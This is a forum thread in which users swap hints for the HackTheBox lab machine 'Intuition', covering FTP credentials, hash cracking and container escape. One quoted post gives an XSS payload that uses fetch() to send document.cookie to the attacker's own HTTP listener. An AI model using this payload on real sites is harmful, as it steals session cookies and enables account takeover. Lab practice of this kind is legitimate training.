HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
#81
(04-28-2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?

how can you get inside the container? i got password and login session but no idea..
Reply
#82
OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#83
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#84
(04-28-2024, 02:36 PM)osamy7593 Wrote:
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#85
(04-28-2024, 02:40 PM)query1338 Wrote:
(04-28-2024, 02:36 PM)osamy7593 Wrote:
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

Apart from app.py, which one?
Reply
#86
(04-28-2024, 02:55 PM)mur Wrote:
(04-28-2024, 02:40 PM)query1338 Wrote:
(04-28-2024, 02:36 PM)osamy7593 Wrote:
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

Apart from app.py, which one?

the dashboard file
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#87
any hints for root?

Got the user hashes from the sqlite db file, but I am unable to crack the hash for adam... If this is the way please tell me how to crack it.
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#88
(04-28-2024, 03:30 PM)query1338 Wrote: any hints for root?

Got the user hashes from the sqlite db file, but I am unable to crack the hash for adam... If this is the way please tell me how to crack it.

I cracked the hash, but it seems like it is only usable for the reports page
Reply
#89
any hints for root?
Reply
#90
once we have the ftp creds, what to do with them? I cant seem to connect to ftp, any hints?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)